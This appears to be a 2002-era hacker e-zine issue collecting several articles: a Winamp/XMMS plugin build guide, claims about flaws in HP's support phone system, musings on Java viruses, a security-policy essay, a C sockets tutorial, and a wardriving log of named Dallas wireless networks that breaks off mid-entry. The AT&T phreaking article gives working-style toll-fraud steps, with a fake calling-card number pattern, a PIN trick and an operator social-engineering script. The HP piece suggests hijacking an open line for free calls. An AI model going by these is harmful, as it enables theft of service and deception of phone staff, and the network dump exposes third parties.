/usr/wine/lib/wine Press Ctrl+x and hit Y to save the file. Now run configure $ ./configure Then you need to edit config.mak $ nano -w config.mak Change line 3 to WINEINCLUDES = /usr/wine/include Press Ctrl+x and hit Y to save the file. Now open Makfile $ nano -w Makefile Change line 32 to winebuild -fPIC -DSTRICT -sym winamp.tmp.o -o winamp.spec.c -exe winamp -mgui -L/usr/wine/lib/wine -lkernel32 -luser32 -lgdi32 Then change line 35 to winebuild -L/usr/wine/lib/wine -L/usr/wine/lib -spec winamp.spec -o winamp.spec.c Press Ctrl+x and hit Y to save. Then type $ make;su -c "make install" After make is done it will ask you for the root password so you can run the command make install WooHoo after that you got it compiled. :-) Now you need to download a version of Winamp ( XMMS does not tell you this. ) I tried several and only got winamp 2.24 to work for me http://68.14.155.25:538/win/ I'm not going to directly link you to the file, Please look for it in there or on some other website. Now Type $ wine winamp224.exe Go ahead and install it. Now download winamp plugins you like from winamp.com or some other website of your choice and install the same way as you did Winamp. $ wine pluginName.exe After that is done start XMMS and hit Ctrl+v You should see Winamp Meta-Plugin [libwinamp.so] as a option, select it, hit configure and fill in your values for the plugin directory and plugin dll you need. Hit OK and then OK from the previous screen then go to your XMMS menu and then visualization options and start up your plugin. --feach -------------------------------------------------------------------------------- [Your Privacy and HP]===============================[b0ld ] -------------------------------------------------------------------------------- Ever call tech support for an HP product that you owned? Well maybe you might want to keep on reading this article.Technical support is one of those lovely features that each and every software / computer industry giant has to service customers. Like any other company the agents go by a call script. One of the main parts is to have your first and last name as well as your telephone number with the area code first. This is actually optional, Remember that "YOU" are giving them the information. You can actually remain anonymous unless its a "serious" issue in which the product would actually need to be repaired, then they will require all of your information. The agents "CANNOT" refuse technical support if your product is within warranty. Now onto some interesting info. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- HP's call routing systems works off an actual VoIP. Even though you maybe calling the phone number for technical support it then gets routed to a VoIP terminal. The VoIP terminal is primarily being used to cut costs on machinery service and maintenance, But there are flaws within the VoIP system that they have and what your going to learn will interest you and may even shock you. The first loop within there system are the voice recognition service in which they have. Simply this is a type of service that is supposed to be "hands free" and "high tech", however the system has proven unsuccessful. On many occaisions you may think that your being routed to the proper product support group. Next thing you know after being on hold for 5 minutes to get an agent you end up finding out that your in the wrong department. So right there you just spent 5 minutes of wasted long distance time. Another problem as well is that sometimes you would get an "echo" effect when your talking to an agent. This makes the situation difficult because you can hear yourself say the same thing almost 4 times. There is also frequent disconnects while on hold as well. Some speaker phones and cell phones actually tend to get disconnected from the terminal itself because there is now "activity" on the line. Now comes the scary part. -=-=-=-=-=-=-=-=-=-=-=-=-=- So you just finished talking to an agent and the problem is either fixed or not fixed... In any occasion you need to make a phone call that basically consists of confidential information. It could be anything from giving out a credit card number or company policy information that you'd only talk to "authorized" people about.. Well it has come to my attention that because of HP's routing system being so "High Tech" It has actually done something that generally is against the law. What tends to happen periodically during the day is that after a customer hangs up normally the terminal would receive the data that the customer hung up so it should close that open line, how ever it would keep itself open which acts like a "tapping" device. The agent on the other end could have there mic on mute and they can now listen to any of your phone calls. This issue has been raised alot during meetings but its seemed that it basically brushed off anyone except for the individual reports this issue. The only way that you can really see whether they were actually listening in is if you have one of those devices that would light up telling you that the line is already being used.. Another interesting fact. -=-=-=-=-=-=-=-=-=-=-=-=- Another flaw in the VoIP terminal is if you end up getting an agent and the agent puts you on hold and then you hear a dial tone, then there is chance for you to use the terminal open line and make and out going calling call anywhere without it affecting your phone bill. Its been basically proven after I decided to do some investigating with the terminal. It would be a charge that would go on hp's bill and not yours. And to be quite honest I wouldn't doubt that you can hold up a party line and go undetected. Another scary part -=-=-=-=-=-=-=-=-=- HP has adopted a new system to do there servicing on there products. The agents use a "web-based" script that enters the necessary information in order to either service a machine or even purchase a machine. What really caught my attention on this matter is when a simple question was asked. Someone asked one of the key people who is in charge of this system "what encryption are you using", and the scary thing is is that they could not positively answer that question. Although they claimed that the information is being "piped" directly into the system and no outside sources can penetrate. Well that theory was actually challenged and the system failed horribly. What's logged on this system is very sensitive data about the customer which includes credit card numbers, names, address's, and phone numbers. Infact an agent can actually punch in a credit card number into this database to try and find someone. The odds of thinking a number just out of the blue is very slim however it CAN be done, and with the data that is being sent and received by the server is really isn't that all secure either. It just takes the right person to find out the right block of ip's and sniff out the data. There is so much data being sent across that network that even though you may not use the proper stealth methods, you'll most likely be undetected anyways. The server itself is also very unstable when trying to work with it. It crashes all the time making information either saved uncorrectly or lost. Its really to bad that they use this system. They are killing off the old system that is actually unix based. They programed win32 shell to work with this system and it has always been reliable. Believe it or not the mainframe of the old system actually works off a Sun Microsystems server machine which is probably the most reliable piece of computer machinery out there. Closing remarks -=-=-=-=-=-=-=- So I hope you've learned a little something here, sure its not all that technical but it basically makes you think twice before you actually give out your information out there. Really you don't know who is on the other line and how poorly secure your information is being held within the company's database but now you know. -------------------------------------------------------------------------------- [Phone Phreaking Lives with AT&T]==================[Cobra ] -------------------------------------------------------------------------------- So with phreaking slowly on the decrease, and the building of tools & boxes to use on phone networks is gettig fewer and further between. So why not just use there own network against them, to make your free calls. Who or What network would be stupid enough to allow such a feat. Well people look no further than your own country. AT&T. Below I explain how one would make free calls through AT&T's calling card service. To start with You will need to find the number for AT&T's calling card service, that you need to dial from your country. Now thankfully AT&T have been thoughtful here, and you can obtain this list from there website at www.att.com. Now for this example I am going to use the number that I would dial from Ireland. So here we go. From a payphone, Cell phone or even your house phone, you dial 1800 55 0000 from Ireland. *I think it is 1800 555 0000 for the US but check first*. Now after dialing that number you will get 'Welcome to AT&T please enter the number you are calling now'. So enter in your number here. Keeping in mind people that for international calls you replace the 00 on the country code for a 01. So for example, The Irish country code is 00353, so you would instead dial 01353. Right now that that's cleared up, we shall move on. After entering your number it will ask you 'Please enter your calling card number and pin or credit card number and expiration date'. If you are calling anywhere outside the US you will only be asked to enter your calling card. Now here comes the fun. When entering the fake calling card, you must remember a few rules; 1) Calling card ALWAYS begins with 2124 or 2123 (2124 is best) 2) Never use a 0 after the 2124. So no 21240. 3) Calling cards are only 10 digits long. So when entering your calling card, you punch in 2124<6 random digits>. Then straight after you enter your calling card number, you then need to enter a pin. So for your pin you enter 4 pound keys. such as # # # #. It will then ask you to re-enter your pin # # # #. Now for some weird reason there system HATES the # key. And it comes up on there system that you have been disconnected from your call and you are trying reconnect. So now after you have dialed in your pin number twice you will get through to an AT&T operator. Now for god sake DONT PANIC!!. This is where you shine up your social egineering skills. You will be greeted with a 'AT&T How may I help you'. Now keeping it REALLY polite and in yourmost posh and business like voice you say ' Hello! Could you redial the same number for me please.. Thank You!'. Now 8 times out of 10 you will get the response ' Certainly, One second, Sorry you had trouble' and you will be through. But there is still the other 2 times out of 10 where you wont get through and you will have to ring back and try again. Trust me though you will get through may take a few trys. But it is well worth it. Because if you are ringing Australia which costs like 50 cents a minute, through at&t you can stay on the phone as long as you like and the bill goes straight back to at&t. So you can now call anywhere in the world and put it on AT&T's tab. Now to add a little story to all this, I will explain a few problems I have had an how I got around it. Before my girlfriend moved here with me, she used to live in Canada. So naturally I was calling her everyday for like 5 hours at a time. Now AT&T will catch on to this volume of usage if it is being directed to one number. Now on Feb 12th this year(2001) at&t banned all calls from Ireland to Canada through there calling card service. The ban was online active for 2 days untill they found away of stopping the calling. On Feb 15th I was arrested for theft of service. But because AT&T could never prove that I was doing illegal acts. The case got dropped. But there was an outcome. I was now no longer able to dial my girlfriends number from anywhere in the country from any phone. It had been banned through the IPC (Irish Phone Companies). Now the way I got around this was simple. I remembered that there was an AT&T Canada. So basically what I did there was. Ring AT&T America and dialed AT&T Canada through them *as the ban was lifted*. So from AT&T Canada I was able to use a similar trick to the AT&T US to get my call to go through. And bobs your uncle. I was back on the track. For people living in Ireland, It is worth investing in an Unregistered SpeakEasy Cellphone and leave CLI off. Keeps you that little bit more anonnymous when making your calls. -------------------------------------------------------------------------------- [Security Method and Technique]==============[Digital Ebola ] -------------------------------------------------------------------------------- /* Welcome to the corperate rant. =) */ Security is a word that most corperations fear. They would like to sweep it under the rug, and rightly so. Security costs money, security costs time, and security brings skeletons out of closets that people would rather remained shut. Not to mention, that highly specialized security engineers are hard to find. It's more then training; it's a knack. You are either good or your not. Even the good can be compromised; the posing parties will be compromised everytime. Justification of security, should not be a hard task. Millions of dollars of present revenue can be lost due to a breach. Billons of dollars of FUTURE revenue can be lost to that same breach. In the digital world, you have to protect your investments, you clients investments, and all data associated with each. The blood of the security world, is information. The person that has the information, will win the battle. A properly secured network can go from properly secured to blantantly open in the matter of minutes. This is why it is important to take any information you can get, no matter the source. Once aquired, the information can be double checked for its authenticity, and acted upon. My personal methodolgy is the "Less is More" set of methods. Your security policy should be written custom against the set of users or tasks that will be utilizing the resources. You give exactly enough for the set tasks to be completed and nothing more. Default installations, will result in a compromise. Default policies, will result in a compromise. The only way is to customize each service or resource for the job. This methodolgy is a hard one; you at once notice the fine line between security and usability. The more flexible the system is to it's users, the more vulnerable it is to its attackers. It is important that such things be included in the policy as password management techniques, password scheming techniques, and password transport should ALWAYS be held in encrypted media when being sent over the wire. Sending it thru email or writing it on the whiteboard can result in a breach. Employees should not have their day to day activities hampered as to how they should utilize resources. Instead, they should be trained on the dangers and be taught to look for signs of digital agression, or inconsistencies. They should be taught the whys of the security policies, and the only hampering they should have to suffer through, should be the use of the right tools to keep themselves in check with the security policy. In the end, this works better, because the employee can use that knowledge and common sense to avoid problems. Keep in mind, this ties right in with password control, the human factor is responsible for 3/4 of all breaches. At no point should censorship be included with the policy, as you turn your employees into sheep that follow directions; if any other aspect was missed in the policy, then you are still compromised. If trained, the employee is no longer a sheep, they can actually aid you in security knowledge, because they are utilizing resources firsthand. There are many technical tricks and methods that can be incorperated into your security policy. The first thing most overlooked, is not technical at all; inventory control. Most companies do not have good inventory control, and this is one of the most crucial things to have. You must know what the machine is, how it is configured, what services are running, and who has access to it. Patch revisions need to be noted, along with a set of identifiers that are machine specific. IP, MAC Address, and a physical serial number, are very important pieces of information. If you don't know what you have on your network, you don't know what to fix if there is a new exploit or advisory released. The security policy in itself should also contain guidelines for each operating system or piece of equipment. What the acceptable configurations are, and how they should be used. This, of course takes alot of time, and alot of meetings. Everyone involved has to agree. It is important to secure each OS on a individule basis. In a large network, this is next to impossible. This is why the OS guidelines are needed. In addition to having a secure OS, you should also consider writing IDS requirements into the policy. Host-based IDS is a very useful item to have, just in case the unthinkable happens. Secure logging mechanisms and kernel monitoring are essential to tracking down the source of the breach. There are many good free software packages in the industry that accomplish this. On the network side of things, there should be a Network Based IDS. This gives you a perspective on what kind of traffic is running across your network, and gives the ability in most instances, to trend attack patterns. This aids your research in some ways, because if you start seeing alot of scans on a certain port, chances are that something new has been released, and you are going to have to patch. I will also touch lightly on firewalls; a firewall is NOT security. Firewalls are icing on the cake. A lot of companies depend on firewalls to protect them, and often there are ways to either circumvent the firewall (UDP can yield interesting results) or maybe there is another access point that is more vulnerable (vpn, dial-in). The point, is to keep track of everyone authorized to enter the network, and to keep track of all access points, not just the front door. And, remember, sometimes the front door can be kicked in. If a attacker breaches, and you have secured the hosts behind the firewall, and you are running vlans.. there is not going to be anything to do. They will be dead in the water, and your company does secure business for another day. I hope this writing can be of some use to someone. It is not EVERYTHING, but it is alot of things I consider important to security. I find that companies tend to overlook these things, and it has become quite a pet peeve. -------------------------------------------------------------------------------- [Java Virii]==================[Archimedes ] -------------------------------------------------------------------------------- Are we: public ? do we have: class ? so begin the: Rambling { As is standard practise for anyone writing anything now, I'd like to thank O'Reilley for publishing books on CD-Rom, which everyone is always happy to pay £50 upwards for... or for about half the price they could get a lot more useful information AND O'Reilly texts from their next door neighbour and other internet users... I DO NOT SUPPORT PIRACY of ANY kind..... Archatos stfu now before i slap that FTP is for educational purposes only!/* Viruses? In Java? Surely not! Isnt the world made of Milk and Honey? (and more milk ;) What would the point of writing a virus in Java be? How could that muppet approach the problem(s)? Oh come on! It's Java!! what do you mean what would the point be, a well written Java virus would be able to sit in anything from your Mobile telephone *cough Nokia 92xx* through your BMW engine monitoring systems, home PC, Flight navigation gear and most importantly..... The Beer refrigerator. Java exists on so many platforms already (and has almost infinite possibility to be implemented on almost anything with enough room for a VM, such as your handy wrist watch using the J2ME.) If Someone was to write a virus, one which just reversed all text displayed by the System.out.* classes, what would happen? Would we end up reading the time and the atmospheric temperature through a mirror? What do you think about when someone says "secure"? No Digi, not a chastity belt. Java is a "Secure" language, take all your thoughts about what you think security is and then write them down (ya right) and compare them to these: SUN implemented only 2 major security aspects in Java 1.0, these being that Java programs should be "Safe from malevolent Programs" (Trojan horses etc) and that Java Programs should be "Non-intrusive", ie they shouldnt have the ability to gather personal information on the host computer or the hosts network. The ability for authentication of Java programs was made in Java 1.1 and when Java 2 (Java 1.2) came out they added the ability for encryption. What does all this mean? Java just ain't as secure as everyone makes out? You decide. Lets look at one feature, when running applets the JVM only allows communication with the server, and the client, no third parties or calls to third parties are allowed by the applet. Now then, all Java code installed locally on the system is trusted implicitly. All code downloaded over the network, however, is untrusted and run in a restricted environment called the "sandbox" (all you VX'ers who need this explaining to you should be shot, CRETINS!) This Sandbox basically, and briefly takes the form of the Java Security Manager (herein JVMSM) How/Can do you Bypass this? Well, the Java SecurityManager is probably the best place to start, but in Java Developers words "Use of a custom SecurityManager is highly discouraged" basically meaning you may well screw up and leave yourself open to malicious content, now WHO would want that! http://java.sun.com/products/jdk/1.2/docs/api/java/lang/SecurityManager. html One thing to bear in mind is that to date, the JVM released itself isnt flawed...only implementations of it, IE / Nutscrape. (Sounds a bit like NT4 being designated a Secure Operating system by the US DoD...didnt note that it had no NIC, Modem, Floppy disk or CD-rom drive in it at the time did they?) The pretty much only way to be garuanteed bypassing of the Applet SecurityManager is to overwright the target's JVMSM, if you can do this on a host you already have a manner of which to upload pretty much anything, be it a rootkit or another executable....now THERE is a tangent...Java as a multi platform rootkit../*notes for future ramblings/* What I consider as the most evident "Virus" written with Java is Brown Orifice, a proof on concept code which once again, doesnt actually flaw the JVM...but Nutscrape itself. -- People are turning to Java, now more noticably (to me atleast) for writing exploits, no longer will you need to worry about the fact that your not running x operating system or Y operating system...just: ]$ java file and there you have a exploit working on whatever platform. (admittadly some of the exploits written in Java have been written using depreciated methods..one word, slackers!) */for reference, when initiating use of the keyboard the structure now is: BufferedReader k = new BufferedReader(new InputStreamReader(System.in)) /* How do we want to spread virii? The JVMSM when it comes to locally running applets is somewhat different. Well, if we can get the target to run the .class file locally, and within the "normal" program is our friendly infector/executor then we have the ability to do whatever we want.. For those who just woke up scroll up a it to where I mention that locally installed Java Applications are trusted implicitly. So anything your user profile can access, the java code can access (yes it is possible to run all Java code in a sandbox, be it a JavaBean, servlet of a full blown app, but for most lusers its just not something that they will be thinking about when accessing their databases etc...or running your P2P client which happens to have a bit more P2P about it that they think.) As with most other languages there are methods to use external processes, in Java this comes in the form of the java.lang.Process (see the lang reference if you want to know more about it in particular), so to do a bit or an O'Reilly-ism { .. java.util.Properties config: String cmd = config.getProperty("sysloadcmd"); if (cmd != null){ Process p = Runtime.getRuntime().exec(cmd); ImputStream pin = p.getInputStream(); InputStreamReader cin = new InputStreamReader(pin); BufferedReader in = new BufferedReader(cin); String load = in.readLine(); in.close(); } .... } Use your imagination...can you pipe chargen to a completly different process? (from DoS methods we know that yes we can dont we) Can one create buffer overflows locally in order to execute other commands which you want to use as you can in c or c++...? Could all of this facilitate in the spreading or a virus? There are enough brains in the world to solve third world debt, use water as fuel and devise practical one use key encryption... if someone hasnt got it working by now it wont be long. Wont be long before our Governments cover it up that is. } All complaints can be sent to digi@legions.org Anything else can be sent to me. Next time maybe I should start writing a bit more in advance... Archimedes, 24/07/02 archimedes@security-foundation.net -------------------------------------------------------------------------------- [The Scene Is Seen As Absolute Shit]==============[2dHero ] -------------------------------------------------------------------------------- With each passing year as the internet grows more, and more, finding specific information your looking for becomes increasingly harder. Not because it's no longer in existance, but because it's surrounded by garbage. It's becoming more, and more like searching through a wastebasket for important documents that you threw away on accident. The same can be said for the hacking community. Often people wonder why these kids email them asking for a mentor to teach them about hacking, or how they hack hotmail, or how do they get in their girlfriends webpage at angelfire.com to do a defacement. I'll tell you why. The ones who are serious about hacking in general who are using the W3 as their portal to knowledge search for hours on search-engines, and repeatedly get flooded with websites containing nothing but ICMP Ping Flooders, ICQ Flooders, Email Bombers, and docs on how to card a brand new Dell Laptop. Yeah, it's annoying to get five emails from kids in Romania asking you to teach them a thing or two, but can you really blame them? Their searching for a needle in a haystack. The others who are only interested in Hotmail, and Trojan Horses know no better. Everything they find leads them to that direction, and they have absolutely no clue that theres a whole hell of alot more to hacking than things of that nature. It's the idiots who are supplying this garbage that should be flamed more so than the kids. Look at IRC; so sweet, and sour. The public channels have become so infested with bullshit some days it's almost sickening to look at the conversations. What could be a great way to share information pertaining to the subject..is not for the most part. It's no longer about what you know, or what your willing to share. It's about flirting, making an online girlfriend, thirty year old women playing house to pass the time, kissing ass for Operator Status in a big 'hacking' channel, or idling for the sole purpose of having a longer idle time than Z3r0wk3wl. Off topic discussion is fine by all means, but when it's all you have, why not /part, and /join #chataway? People who are contributing absolutely nothing to the community, and know absolutely nothing more than how to boot, connect, and fire up mIRC with ops in these channels /kb-ing what could be knowledgible people, because they think their music sucks or for no reason at all. What the fuck? Why even op these people in channels like that when you KNOW they know absolutely nothing. Listen, the vagina they may possess halfway across the globe will never serve you any purpose. Even the +s/p channels now days are about the same way. This article is obviously a rant, and nothing more. It will change absolutely nothing, but maybe it will get a few thinking about exactly where the scene is going; to hell. Not all websites, and IRC Channels are full of shit. There are a...few IRC Channels around that are worthwhile, and lots of webpages, but the scriptkids, carders, power tripping cluebag ops, digital teenage pranksters, and horny thirty-something year old women by far outnumber any of the legit contributors. -------------------------------------------------------------------------------- [Linux C Socket Programming]=====================[??????? ] -------------------------------------------------------------------------------- /* Editor's note: Who the hell sent this article? */ Opening a socket int socket(int domain, int type, int protocol); In unix environments sockets are labeled as file descriptors or fd's for short, so in essence open a socket is the same as opening a file, because you are reading and writing to an Input/Output stream or IO stream. File descriptors are refrenced as integers, which the socket call returns. ------------------------------------------------- int fd; fd = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP); ------------------------------------------------- In this code section we declare an integer fd and use it to store the descriptor returned from socket() for later use. The first argument in socket() is the domain or address family or protocol family, usaully PF_INET or AF_INET(both the same as defined in /usr/include/linux/socket.h or /usr/include/bits/socket.h) PF_INET is protocol family IPv4 Internet Protocols. The next argument type, is the type of packet to send, usually SOCK_STREAM, which is used for TCP or SOCK_DGRAM for UDP(these can also be found defined in /usr/include/bits/socket.h). The next field is the protocol, if we use 0 for this field the kernel should automatically enter the right value for us, you can also, grep 'protocol' /etc/protocols which will give you the number, which would help make the code more portable. I used IPPROTO_TCP which is defined in /usr/include/linux/in.h as 6, which is the same number the /etc/protocols would give. UDP is 17 or IPPROTO_UDP is equal to 17. socket() returns socket file desciptor on success, -1 on error. Making connections int connect(int socket_file_descriptor, struct sockaddr *server_address, int address_length); Connect is used to make UDP and TCP connections. After we have successfully created a socket(we need the socket file descriptor for connect()) we can make a connection, but not before we fill in the struct sockaddr_in. ------------------------------------------- int fd; struct sockaddr_in target; fd = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP); memset(&target, '\0', sizeof(sockaddr_in)); target.sin_family = PF_INET; target.sin_port = htons(23); inet_aton("127.0.0.1", &target.sin_addr); connect(fd, &target, sizeof(struct sockaddr)); ------------------------------------------- First we declare an int to store the return value of socket(), next we declare a struct sockaddr_in. The reason we declare a struct sockaddr_in is connect takes a struct sockaddr value as one of it's arguements to fill this struct we use the corresponding protocol structure from /usr/include/netinet/in.h, ours being Internet. we open a socket which was explained before and store the return file descriptor value in fd. struct sockaddr_in is padded so it is the same size as sockaddr so we use memset to NULL out and fill the padded struct(man memset for more info). We now enter value for the members in this structure, target.sin_family, which is the protocol family again we want IPv4 Internet so we specify PF_INET. Next is target.sin_port, which is the port number we want to connect to. We use htons or host to network short which it stands for, the reason we use this is our host byte order is least significant byte first, the Internet use most significant byte first. For example for our address 127.0.0.1 the hex value would be 0x7f000001, most significant byte first would store it as 0x100000f7, thats an IP address though which is a long integer which we would use htonl for(host to network long) a port is a short int, between 0 and 65535, same idea smaller value. Next we use inet_aton to convert our IP address 127.0.0.1 from numbers and dots into binary and store it in a struct in_addr. Well we are lucky sockaddr_in(as declared in /usr/include/netinet/in.h) has a struct in_addr member, it is sin_addr. But since inet_ntoa is looking for a struct in_addr pointer we need to use the & symbol to store it in the address of, like a pointer points into an address. Now last but not least we are on connect. connect take 3 arguments the first being our opened socket, which we stored in fd so fd is our first argument, the second argument is a struct sockaddr *server_address. we use &target to simulate a pointer to our struct sockaddr_in which is a compatible struct with sockaddr, it is padded to be the same size, the last argument is the address length which is stored in struct sockaddr so we use a simple sizeof(struct sockaddr) to get that. connect() returns 0 on success, -1 on error. Simple Program to make a TCP connection to 127.0.0.1 port 23 ------------------------------------------------------------------------------- #include #include /* these next two are for socket() and connect() */ #include #include /* for struct sockaddr_in */ #include int main() { int fd; struct sockaddr_in target; /* this creates our TCP socket, and checks and see if it returns -1, if it does we print the error it recieved and exit the program, for UDP instead of SOCK_STREAM, use SOCK_DGRAM */ if((fd = socket(PF_INET, SOCK_STREAM, 0)) == -1) { perror("Socket"); exit(-1); } memset(&target, '\0', sizeof(struct sockaddr_in)); target.sin_family = PF_INET; target.sin_port = htons(23); inet_ntoa("127.0.0.1", &target.sin_addr); /* we make our connect call and check and see if it fails if it does we print the error and exit */ if((connect(fd, &target, sizeof(struct sockaddr))) == -1) { perror("Connect"); exit(-1); } printf("Connection completed to 127.0.0.1 port 23\n"); /* close our socket file descriptor */ close(fd); return 0; } ------------------------------------------------------------------------------- Sending and Receiving Data -For TCP or UDP- send(int socket_file_descriptor, char what_to_send[], int message_length, int flags); recv(int socket_file_descriptor, char receive_buffer[], int buffer_size, int flags); -For UDP- sendto(int socket_file_descriptor, char what_to_send[], int message_length , int flags, struct sockaddr *to, int to_length); recvfrom(int socket_file_descriptor, char receive_buffer[], int buffer_size , int flags, struct sockaddr *from, int from_length); After we have established a TCP connection or a peer to peer UDP connection(UDP is a connectionless protocol but connect calls can be made using it, the sendto() and recvfrom() can be used without a connect call on UDP sockets), we can send and receive data across the connection using send and receive calls. Both a realativly easy to use, we plug in our already connected file descriptor as the first argument for both, next we supply a buffer or a message, both just storage variables one for sending in send() and one for receving in recv(). The third argument these differ in that send wants the message length while recv wants the buffer size, so for send we just do a strlen(message); to return the string length of the message and for receive we do a sizeof(buffer); to get ther size of our buffer. The last argument is if we want to use flags, we really shouldn't bother with these unless we have a specific intent, but if you want to know the flags can be found in the man pages for send and recv. Simple program to make connection to 127.0.0.1 port 80 and get the header for the web server root directory or main web page ------------------------------------------------------------------ #include #include /* these next two are for socket(), connect(), send(), recv()*/ #include #include /* for struct sockaddr_in */ #include int main() { int fd, bytes; char buffer[256], *message = "HEAD / HTTP/1.0\r\n\r\n"; struct sockaddr_in target; /* this creates our TCP socket, and checks and see if it returns -1 if it does we print the error it recieved and exit the program */ if((fd = socket(PF_INET, SOCK_STREAM, 0)) == -1) { perror("Socket"); exit(-1); } memset(&target, '\0', sizeof(struct sockaddr_in)); target.sin_family = PF_INET; target.sin_port = htons(80); /* port 80 is HTTP port */ inet_ntoa("127.0.0.1", &target.sin_addr); /* we make our connect call and check and see if it fails if it does we print the error and exit */ if((connect(fd, &target, sizeof(struct sockaddr))) == -1) { perror("Connect"); exit(-1); } printf("Connection completed to 127.0.0.1 port 23\n"); printf("Sending %s\n", message); /* send our get request */ send(fd, message, strlen(message), 0); /* recv returns the number of bytes it receives on success we use this to NULL terminate our receive buffer array */ bytes = recv(fd, buffer, sizeof(buffer), 0); buffer[bytes] = '\0'; printf("We received:\n%s\n", buffer); /* close our socket file descriptor */ close(fd); return 0; } ------------------------------------------------------------------- Well thats all for now, maybe next KV issue I will go further in detail on the use of sockets we will see, but for now back to hacking out some code. -------------------------------------------------------------------------------- [Dallas Metroplex Wardriving Data]===========[Digital Ebola ] -------------------------------------------------------------------------------- Hi! Recently, I went out wardriving with some friends. We had a blast, and managed to actually get lost with a GPS in the car. I am not sure how we did that, but we did. The published results from walledcity.legions.org (my laptop) is below. The path we took (this isnt complete by any means, but its a good trail to follow) is Grapevine to I-635, I-635 to I-35, I-35 to Commerce Street, Commerce Street to I-75, I-75 to I-635 and back to Grapevine. For those that are not familiar with the area, please consult a map on Dallas, Texas, USA. =) All data here was grabbed with Kismet. I do not have the GPS data, because that was on another lappy. This data is current as of 6-22-2002. Network 1: "l33t" BSSID: "00:02:2D:00:12:27" Type : À¾ÿ¿¼¾ÿ¿` Sat Jun 22 20:30:48 2002 Info : "None" Channel : 00 WEP : "No" Maxrate : 0.0 LLC : 4756 Data : 193 Crypt : 0 Weak : 0 Total : 4949 First : "Sat Jun 22 20:30:48 2002" Last : "Sat Jun 22 21:06:50 2002" Network 2: "etwireless" BSSID: "00:01:F4:ED:53:86" Type : infrastructure Info : "None" Channel : 11 WEP : "No" Maxrate : 11.0 LLC : 8 Data : 0 Crypt : 0 Weak : 0 Total : 8 First : "Sat Jun 22 20:34:45 2002" Last : "Sat Jun 22 20:34:56 2002" Network 3: "etwireless" BSSID: "00:01:F4:ED:4F:2B" Type : infrastructure Info : "None" Channel : 01 WEP : "No" Maxrate : 11.0 LLC : 3 Data : 0 Crypt : 0 Weak : 0 Total : 3 First : "Sat Jun 22 20:34:50 2002" Last : "Sat Jun 22 20:34:55 2002" Network 4: "" BSSID: "00:40:96:40:E5:B8" Type : infrastructure Info : "TX06_05_APc" Channel : 06 WEP : "Yes" Maxrate : 11.0 LLC : 2 Data : 0 Crypt : 0 Weak : 0 Total : 2 First : "Sat Jun 22 20:37:12 2002" Last : "Sat Jun 22 20:37:17 2002" Network 5: "" BSSID: "00:40:96:41:0E:E3" Type : infrastructure Info : "TX10_09_APc" Channel : 06 WEP : "Yes" Maxrate : 11.0 LLC : 12 Data : 0 Crypt : 0 Weak : 0 Total : 12 First : "Sat Jun 22 20:37:26 2002" Last : "Sat Jun 22 20:37:46 2002" Network 6: "" BSSID: "00:40:96:40:B5:0A" Type : infrastructure Info : "TX04_03_APe" Channel : 06 WEP : "Yes" Maxrate : 11.0 LLC : 17 Data : 0 Crypt : 0 Weak : 0 Total : 17 First : "Sat Jun 22 20:37:26 2002" Last : "Sat Jun 22 20:37:31 2002" Network 7: "" BSSID: "00:40:96:46:33:B3" Type : infrastructure Info : "TX10_GR_APc2" Channel : 06 WEP : "Yes" Maxrate : 11.0 LLC : 5 Data : 0 Crypt : 0 Weak : 0 Total : 5 First : "Sat Jun 22 20:37:26 2002" Last : "Sat Jun 22 20:37:31 2002" Network 8: "" BSSID: "00:40:96:41:17:62" Type : infrastructure Info : "TX06_04_APd" Channel : 06 WEP : "Yes" Maxrate : 11.0 LLC : 17 Data : 0 Crypt : 0 Weak : 0 Total : 17 First : "Sat Jun 22 20:37:28 2002" Last : "Sat Jun 22 20:37:32 2002" Network 9: "" BSSID: "00:06:25:50:AB:68" Type : infrastructure Info : "None" Channel : 08 WEP : "No" Maxrate : 11.0 LLC : 1 Data : 0 Crypt : 0 Weak : 0 Total : 1 First : "Sat Jun 22 20:37:28 2002" Last : "Sat Jun 22 20:37:28 2002" Network 10: "" BSSID: "00:40:96:42:0F:A4" Type : infrastructure Info : "TX06_03_APd" Channel : 06 WEP : "Yes" Maxrate : 11.0 LLC : 4 Data : 0 Crypt : 0 Weak : 0 Total : 4 First : "Sat Jun 22 20:37:29 2002" Last : "Sat Jun 22 20:37:31 2002" Network 11: "" BSSID: "00:40:96:41:58:23" Type : infrastructure Info : "TX10_02_APc" Channel : 06 WEP : "Yes" Maxrate : 11.0 LLC : 4 Data : 0 Crypt : 0 Weak : 0 Total : 4 First : "Sat Jun 22 20:37:30 2002" Last : "Sat Jun 22 20:37:35 2002" Network 12: "" BSSID: "00:40:96:41:56:B6" Type : infrastructure Info : "TX06_02_APd" Channel : 06 WEP : "Yes" Maxrate : 11.0 LLC : 3 Data : 0 Crypt : 0 Weak : 0 Total : 3 First : "Sat Jun 22 20:37:30 2002" Last : "Sat Jun 22 20:37:35 2002" Network 13: "" BSSID: "00:40:96:41:1F:AE" Type : infrastructure Info : "TX10_07_APd" Channel : 06 WEP : "Yes" Maxrate : 11.0 LLC : 13 Data : 0 Crypt : 0 Weak : 0 Total : 13 First : "Sat Jun 22 20:37:35 2002" Last : "Sat Jun 22 20:37:50 2002" Network 14: "" BSSID: "00:40:96:41:0A:37" Type : infrastructure Info : "TX10_09_APd" Channel : 06 WEP : "Yes" Maxrate : 11.0 LLC : 14 Data : 0 Crypt : 0 Weak : 0 Total : 14 First : "Sat Jun 22 20:37:42 2002" Last : "Sat Jun 22 20:37:50 2002" Network 15: "linksys" BSSID: "00:60:1D:23:E2:99" Type : probe Info : "None" Channel : 00 WEP : "No" Maxrate : 0.0 LLC : 796 Data : 0 Crypt : 0 Weak : 0 Total : 796 First : "Sat Jun 22 20:38:29 2002" Last : "Sat Jun 22 20:39:49 2002" Network 16: "USIG_Boardroom" BSSID: "00:40:96:54:59:C1" Type : infrastructure Info : "None" Channel : 01 WEP : "Yes" Maxrate : 11.0 LLC : 9 Data : 0 Crypt : 0 Weak : 0 Total : 9 First : "Sat Jun 22 20:39:56 2002" Last : "Sat Jun 22 20:40:06 2002" Network 17: "w3y3rl355" BSSID: "00:40:96:54:EF:B7" Type : infrastructure Info : "AP5thFloor" Channel : 06 WEP : "Yes" Maxrate : 11.0 LLC : 35 Data : 0 Crypt : 0 Weak : 0 Total : 35 First : "Sat Jun 22 20:39:57 2002" Last : "Sat Jun 22 20:40:34 2002" Network 18: "USIG_Training" BSSID: "00:40:96:43:32:CF" Type : infrastructure Info : 